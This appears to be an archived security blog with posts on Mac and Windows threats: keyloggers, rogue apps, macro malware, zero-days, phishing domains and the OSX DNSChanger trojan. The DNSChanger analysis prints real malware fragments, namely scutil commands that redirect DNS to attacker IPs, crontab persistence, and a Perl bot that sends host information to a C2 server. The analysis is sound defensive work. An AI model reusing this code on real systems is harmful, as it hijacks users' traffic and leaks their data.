Archive
Pay-Per-Install A Malware Retail Business
Like any other business, there’s always a competition. Another pay-per-install retailer claims to be the best partner.
So now, the webmaster’s websites serving this pest will just need to logged-in to his account to check and monitor the count of installs and earnings.
Counting malware infection is now a $$ business!
As of the moment, this business carries binaries that works only in Windows platform. But remember, it is possible that this pest will also include binary for Mac just like Zlob codec crosses over and produced Trojan DNSChanger.
Snoop, Sneak, Sniff
Mac users are more likely affected by tracking threats than malware.
Why? Let’s start by defining what is a tracking threat.
Tracking threat are software or application that snoop user’s activity, sneak password and sniff out private information. Software or applications such as keyloggers and sniffers are considered as tracking threats and they are vastly available over the internet.
This type of software/application are also classified as grayware. Graywares are not considered as malwares and they are not even dangerous by itself. However, just like a kitchen knife, if it falls to a wrong guy it will definitely poses threat to the user and to other people as well.
Let’s take a look on LogKext.
LogKext is the only kernel-based freeware keylogger for Mac OS X. It is controlled by a command-line client called logKextClient.
LogKext.pkg is the installer that contains eight different packages. During the installation process, the user is required to enter the administrator or root user password to authenticate.
Below are the packages and its descriptions.
logkextdaemon.pkg – This package contains logKextDaemon, which is in Mac universal binary format. This binary is a daemon program that runs in background and manages the keylogging activity.
logkextkeymap.pkg – This package contains property list file, logKextKeymap.plist. The list includes identifiable keys such as numbers, letters (upper and lower case) and characters.
Logkext-1.pkg – This package contains another package named LogKext.kext, which contains a binary file LogKext. LogKext is the main program responsible for intercepting keyboard events by using IOHIDSystem and IOHIKeyboard classes in the kernel.
logkextReadme.pkg – This package contains LogKext Readme.html, which includes install and uninstall guide, release notes and frequently asked questions.
logkextuninstall.pkg – This package contains LogKextUninstall.command, which is a terminal shell script that stops logKext from running and removes it’s related files.
The packages were installed in this order:
logKext.pkg/Contents/Packages/logkextuninstall.pkg
logKext.pkg/Contents/Packages/logkext.pkg
logKext.pkg/Contents/Packages/logkextkeymap.pkg
logKext.pkg/Contents/Packages/logkext-1.pkg
logKext.pkg/Contents/Packages/logkextdaemon.pkg
logKext.pkg/Contents/Packages/logkextclient.pkg
logKext.pkg/Contents/Packages/logkextkeygen.pkg
The following files were created:
LogKext Readme.html
/Library/Application Support/logKext/logKextDaemon
/Library/Application Support/logKext/logKextKeyGen
/Library/Application Support/logKext/logKextKeymap.plist
This program can monitors and record user’s keystrokes including username, password, PII, private conversations, typed-in urls and more.
So, imagine if this piece of software went to the wrong hands ?
It is more scary when you thought you have downloaded and installed a clean application, but with undocumented details there’s more hidden or unexplainable features that could work in background.
Let’s take a look on Keylogger X.
Downloaded file: KeyloggerX.dmg.sit (768,805 bytes)
Inside this image are the following files:
Disclaimer.rtf – This document informs the user that “You are held resposible for your actions”. Check the full disclaimer here.
Keylogger X – This is the binary file in Prefered Executable Format File (signature start with “Joy!peffpwpc”).
Read Me.rtf – This document describes this program as “Keylogger X is designed to run on OSX. The logged file is saved in the users preference folder called “User Preferences”. “
Ok, let’s run and check this program. Oops, there’s nothing on your screen, you cannot even search for “User Preferences” folder. Where? Nobody knows!
Is it running in background ?
Upon checking the code, this program imports 3 containers with over 900 imported symbols that includes multimedia and networking.
From the data section, you will find more interesting strings.
Congratulations! You just installed a “more efficient keylogger”.
The behavior of this program is not acceptable and absolutely real threat to users.
Let’s Go Retro with Macro
What is Macro ?
How Macro is created?
There are two ways:
(1) Macro Recorder
Example, I want to display the words “Useful Macro” in Word document whenever I type shortcut key Control+R. This can be done by simply recording it. Check the screenshot here.
By default this is stored in Normal.dot, which means the recorded macro could work to every single document opened.
(2) Visual Basic Editor (VBE)
Advance macros uses Visual Basic for Applications programming.
For further discussion, you can check your favorite search engine with the following keywords: VBA, Visual Basic for Applications programming, Macros with VBE
What makes Macro a threat ?
How would you know if the document has macros ?
MS Office displays this warning below if the document you are trying to open has macros.
You can simply “Disable Macros” and continue working with the document.
You can also view the macro code from Visual Basic Editor by pressing “Alt+F11″.
Below are screenshots of real malicious macros in Word, Excel and PowerPoint.
In summary, malicious macros are cross-platform threats. They could work and damage both Mac and Windows pc users. Awareness of these threats are very important in protecting our daily computing lives.
A Deeper Look On MacSweeper
Do you think Macsweeper is not a rogue application? Ok, let’s take a deeper look and see what it does.
::::::::::::
File Size
::::::::::::
MacSweeperSetup.dmg 1.5 MB (1,600,201 bytes)
MacSweeper.app 2.6 MB (2,563,303 bytes)
:::::::::::::::::
Installation
:::::::::::::::::
Behind this page is a SWF flash file and javascripts that records the traffic and clicks.
After the fake display of scanning process, this bogus website displays an Alert box.
Clicking “Ok” triggers the downloading of MacSweeperSetup.dmg. Inside this DMG file is the rogue application – MacSweeper.app.
MacSweeper does not require root admin password to execute and it remains in Download folder unless the user manually drag it to another location.
::::::::::::::
Network
::::::::::::::
Lookup information of http://www.macsweeper.com:
http://www.macsweeper.com. A 217.20.175.39
ns1.vici.au NS 217.20.175.157
ns2.vici.au NS 217.20.182.29
alt1.aspmx.l.google.com MX 209.85.147.27
alt2.aspmx.l.google.com MX 64.233.185.27
aspmx.l.google.com MX 66.249.93.27
Cleanator is a rogue application that works in Windows platform.
:::::::::::::::::::::::::::::::
Behaviour & Analysis
:::::::::::::::::::::::::::::::
Most of the files inside MacSweeper.app are images file (in PNG file format). Let’s check the other files …
PkgInfo contains strings “APPL????”
Database.plist contains 6390 cookie data that looks like this:
Cookie
YMR6LmFmdGVyZGF3bi5uZXQ
TODO.txt contains list of things to do that includes its current limitation, bugs and features. Interesting info from this text file is this:
“18. When update in process arert of new version can come, and fuck everithing”
You may check the complete list here.
Info.plist contains the following strings:
Package Type: APPL
Executable: MacSweeper
The file MacSweeper inside MacOS folder is a binary file in universal binary format. Which means, this could work both in PPC and x86.
From the screenshot above, you will think that this application has scanned unwanted files from your system. However in background, MacSweeper executes the following shell command:
file -f /private/tmp/com.MacSweeper.found.tmp -kn | grep ‘universal binary’ | sed -e ‘s/: *Mach.*//g’ > /private/tmp/com.MacSweeper.found2.tmp;
exit;
lipo “%@” -thin %@ -output “%@.lipo”&& mv -f “%@.lipo” “%@”;
During the scanning process, it drops the following temporary files:
/private/tmp/com.MacSweeper.found.tmp
/private/tmp/com.MacSweeper.found2.tmp
It then uses these files to display the scan result. This application does not scan for unwanted files, instead it is giving you list of legitimate information installed in your system.
And it does not end here, few minutes after displaying the scan result, it will display a bugging screen as shown below:
What! privacy violation with your own legitimate files ? Absolutely, not right.
From the code, this application unlocks more feature and displays the message below once the user input a valid serial code.
Thank You! You made me a bit hapier
Definitely, this application is not just a rogue but also a junkware.
QuickTime 7.4 Fixes Multiple Vulnerabilities
The vulnerabilities that was addressed includes following:
(1) Memory corruption in QuickTime’s handling of Sorenson 3 video files.
(2) Memory corruption in QuickTime’s handling of Macintosh Resource records in movie files.
(3) Memory corruption in QuickTime’s parsing of Image Descriptor (IDSC) atoms.
(4) Buffer overflow in processing a compressed PICT image.
Thus, Quicktime users are advised not to play streaming media that uses rstp protocol (rstp:\\) until a fix is made available.
Zero Day Exploit: MS Excel Allows Remote Code Execution
There is a zero day flaw found in Microsoft Excel and this vulnerability affects the following version:
Microsoft Office Excel 2003 Service Pack 2
Microsoft Office Excel Viewer 2003
Microsoft Office Excel 2002
Microsoft Office Excel 2000
Microsoft Excel 2004 for Mac
What causes this threat ?
When a user opens a specially crafted Excel file and that has a malformed header information, the system encounters unspecified error, which can be exploited by malicious users and could lead to execution of arbitrary code.
According to Microsoft, there is an active attacks that currently exploits this vulnerabiltity. Thus, users are advised not to open untrusted Excel file.
MacSweeper First Rogue Application in Mac
Beware! First rogue application in Mac is here.
Once the user click “Remove”, it will download MacSweeperSetup.dmg and install MacSweeper.app – the rogue application.
There are two images or looks that links to this rogue application.
(1) The screenshot shown above is the image displayed when you visit this url:
=maxc_clr07&cid=2271&parid=mc_346586211
MacSweeper does not need root admin password to execute the application. In fact it is just a portable application and no installation required. Here’s the screenshot below:
Zero Day Exploit: Buffer-overflow in Quicktime Player
The zero day vulnerability was found when Quicktime encounters a RSTP (Real-Time Streaming Protocol) link ex. rstp:// and no custom port has been specified, it handles the call by scanning port 554. However, if port 554 server is closed, Quicktime automatically switch to HTTP protocol and scans port 80, where the server returns 404 error message. If the returned HTTP error message from the server is so long, QuickTime media link file does not know how to handle this message – because it lacks input validation, thus causes buffer overflow.
This vulnerability can be exploited by a malicious application or website, which then allows execution of arbitrary codes on the user’s system.
Luigi Auriemma, an italian security researcher has discovered this flaw and posted a bug report with proof-of-concept exploit code.
Analysis of OSX Trojan DNS Changer
::::::::::::
DMG : ~ 17.1 KB (17,598 bytes)
Installer.pkg : ~132 KB (135,168 bytes)
:::::::::::::::::
::::::::::::::::::::::::::::::::::
The disk image file will be automatically mounted but not extracted. This means, the user has to manually install the downloaded file.
The downloaded installer – Install.pkg, contains the following files:
Info.plist is the first file invoked during the installation. This file contains detailed usage information and behavior such as:
Application Type: MacVideo
Release Version: 1.0
Authorization Action: RootAuthorization
Default Location: /Library/Internet Plug-Ins/
Installed Size: 60
Restart Action: NoRestart
Followed by Archive.bom, which contain information of files to install.
.
./Mozillaplug.plugin
./Mozillaplug.plugin/Contents
./Mozillaplug.plugin/Contents/Info.plist
./Mozillaplug.plugin/Contents/MacOS
./Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin
./Mozillaplug.plugin/Contents/Resources
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE
./Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak
./Mozillaplug.plugin/Contents/version.plist
./QuickTime.xpt
./plugins.settings
./sendreq
It then access the files description.plist and PkgInfo, which gives the following information:
Version: 1.0
Description: “Its a suppa puppa desc yo”
Title: MacCodec
PkgInfo: pmkrpkg1
Followed by BundleVersions.plist for version informations.
The installer comes with a “License Agreement”. Upon clicking “Continue”, a message box will display requiring the user to click “Agree” to continue the installation process.
Ok, let’s look further on the malicious codes.
Postinstall and postupgrade contains exactly the same code, as well as preinstall and preupgrade.
Preinstall is invoked after the user agreed on the License Agreement. This trojan does not have damaging payloads, except it only modifies users’ DNS setting. Let’s check the code.
:::::::::::::::::::::::
Preinstall script:
s1=85.255.115.22
s2=85.255.112.190
path=”/Library/Internet Plug-Ins”
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e ‘s/.*PrimaryService : //’)<
Using Scutil, it retrieves user’s primary network interface.
open
get State:/Network/Global/IPv4
d.show
quit
EOF
)
It then modifies DNS name server IP to s1=85.255.115.22 and s2=85.255.112.190.
/usr/sbin/scutil
open
d.init
d.add ServerAddresses * $s1 $s2
set State:/Network/Service/$PSID/DNS
quit
**Take note: IP addresses may change per variant.
It checks for a crontab file – plugins.settings, in this location “/Library/Internet Plug-Ins”. This file is a marker, it indicates whether this trojan has been previously installed or not.
exist=`crontab -l|grep plugins.settings`
If plugins.settings does not exist (meaning, it was not yet installed), the installation will proceed by dropping a temporary file \cron.inst
echo “* * * * * \”$path/plugins.settings\”>/dev/null 2>&1″ > cron.inst
Cron.inst has the following strings:
It will execute cron.inst using Crontab command.
crontab cron.inst
Cron.inst executes another script, Quicktime.xpt. This is found in this location /Library/Internet Plug-Ins/
“/Library/Internet Plug-Ins/QuickTime.xpt”
In background, it will create a temporary file named, 1.
>/dev/null 2>&1
QuickTime.xpt redirects its output to this file instead of popping error or script command to the user’s screen.
Once cron.inst is executed, preinstall script will delete this temporary file.
rm -rf cron.inst
fi
QuickTime.xpt script:
This script is inside Archive.pax.gz. The installation ends by executing cron.inst, which extracts its content to this location /Library/Internet Plug-Ins/.
Like preinstall script, QuickTime.xpt checks for users network information, attempt to modify DNS name server settings, checks the existence of QuickTime.xpt and if exist, it creates cron.inst, execute it and delete temporary file, 1.
Postinstall script:
#!/bin/sh
path=”/Library/Internet Plug-Ins/”
/usr/bin/perl “$path/sendreq”
rm -rf “$path/sendreq”
It executes sendreq, which is a perl script and deletes it.
SendReq Script:
This perl base bot acts as a backdoor client component and communicates to a remote server through socket.
#!/usr/bin/perl
use IO::Socket;
It uses MIME base64 encoding to transmit messages through HTTP.
my $eol = $_[1];
$eol = “\n” unless defined $eol;
my $res = pack(“u”, $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 – length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/’=’ x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
}
The bot command-and-control server:
my $server=”85.255.121.37″;
**Take note: IP addresses may change per variant.
Executes uname -p command to retrieve victim’s operating system processor type and hostname for the IP address.
my $cmd=’uname -p;echo “;”;hostname’;$cmd=~s/\n//g;
Encode the gathered information, indicating “mac”.
Send a request to remote server.
This bot sends a request to the remote server, attempting to establish a connection through TCP port 80.
print $socket $request;
close($socket);
Captured packet looks like this:
It sends victim’s information in base64 encoded strings:
Decoded version:
Furthermore, later versions of this trojan scripts are obfuscated making it little difficult for security analyst and researchers to read the code.
::::::::::::::::
Trojan DNSChanger is as simple as changing DNS settings – no complication and no destructive behavior. These are simple scripts that are widely available online, built into mac installer and deployed to several existing fake codec domains.
The lesson here is that malwares or threats in Mac does not have to be complicated. With the vast information available online, it is possible that an ordinary person without programming background – also called script kiddie, can cause interruption and damage to our daily lives.
Phish Facebook, Phish Myspace too!
Let’s start with this screenshot below.
Let’s perform DNS lookup with the FQDN – 371233.cn.
The screenshot below is a Myspace phising site.
more links …
profile.myspace.com.fuseaction.user.viewprofile.9w.11523822.cn
profile.myspace.com.fuseaction.id.0ed37i8xdd.378d38.cn
profile.myspace.com.fuseaction.id.user.viewprofile.1878800.cn
In summary, phising and scam spams are cross-platform web base attack. It aims to steal your identity and your money!
Mac and iphone users are not exempted.
Recent Comments